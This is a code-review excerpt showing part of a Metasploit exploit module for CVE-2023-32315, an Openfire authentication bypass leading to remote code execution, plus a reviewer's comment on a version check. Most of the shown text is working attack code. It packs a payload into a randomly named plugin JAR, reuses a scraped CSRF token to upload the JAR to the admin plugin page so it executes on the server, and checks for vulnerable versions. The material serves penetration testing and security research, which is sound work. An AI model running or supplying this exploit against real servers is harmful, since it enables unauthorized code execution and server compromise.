modules/exploits/multi/http/openfire_auth_bypass_rce_cve_2023_32315.rb

```diff
@@ -0,0 +1,275 @@
+    files = [
+      [ 'logo_large.gif' ],
+      [ 'logo_small.gif' ],
+      [ 'readme.html' ],
+      [ 'changelog.html' ],
+      [ 'lib', 'plugin-metasploit.jar' ]
+    ]
+
+    jar = Rex::Zip::Jar.new
+    jar.add_files(files, File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-32315'))
+
+    @plugin_name = datastore['PLUGINNAME'] || Rex::Text.rand_text_alphanumeric(8..15)
+    plugin_author = datastore['PLUGINAUTHOR'] || Rex::Text.rand_text_alphanumeric(8..15)
+    plugin_desc = datastore['PLUGINDESC'] || Rex::Text.rand_text_alphanumeric(8..15)
+
+    plugin_xml = File.binread(File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-32315', 'plugin.xml'))
+    plugin_xml.gsub!(/PLUGINNAME/, @plugin_name)
+    plugin_xml.gsub!(/PLUGINDESCRIPTION/, plugin_desc)
+    plugin_xml.gsub!(/PLUGINAUTHOR/, plugin_author)
+
+    jar.add_file('plugin.xml', plugin_xml)
+    return jar
+  end
+
+  def upload_and_execute_plugin(plugin_jar)
+    # upload and execute Openfire plugin with encoded payload
+    # returns true if upload is successful else returns false
+
+    # construct multipart form data
+    form_data = Rex::MIME::Message.new
+    form_data.add_part(plugin_jar.to_s, 'application/x-java-archive', 'binary', "form-data; name=\"uploadfile\"; filename=\"#{@plugin_name}.jar\"")
+
+    # extract the csrf token
+    cookie_jar.cookies.each do |cookie|
+      @csrf_token = cookie.to_s.split('=')[1].strip unless cookie.to_s.match(/csrf=/).nil?
+    end
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'plugin-admin.jsp'),
+      'ctype' => "multipart/form-data; boundary=#{form_data.bound}",
+      'keep_cookies' => true,
+      'data' => form_data.to_s,
+      'vars_get' => {
+        'uploadplugin' => nil,
+        'csrf' => @csrf_token.to_s
+      }
+    })
+    # with a successfull upload and execution of the plugin, no response is returned.
+    return true unless res
+    # safety check if, for whatever reason, we get a 302 response back
+    if res.code == 302 && res.headers.to_s.match(/uploadsuccess=true/)
+      return true
+    else
+      return false
+    end
+  end
+
+  def check
+    openfire = get_version
+    return CheckCode::Safe if openfire.empty?
+    # check first for patched versions
+    return CheckCode::Safe("Openfire version is #{openfire['version']}") if Rex::Version.new(openfire['version']) == Rex::Version.new('4.6.8')
+    return CheckCode::Safe("Openfire version is #{openfire['version']}") if Rex::Version.new(openfire['version']) == Rex::Version.new('4.7.5')
+    return CheckCode::Safe("Openfire version is #{openfire['version']}") if Rex::Version.new(openfire['version']) == Rex::Version.new('4.8.0')
+
+    if Rex::Version.new(openfire['version']) < Rex::Version.new('4.8.0') && Rex::Version.new(openfire['version']) >= Rex::Version.new('3.10.0')
+      CheckCode::Vulnerable("Openfire version is #{openfire['version']}")
```

Comment:
```suggestion
      CheckCode::Appears("Openfire version is #{openfire['version']}")
```
Version match is `Appears`; using the vuln successfully used.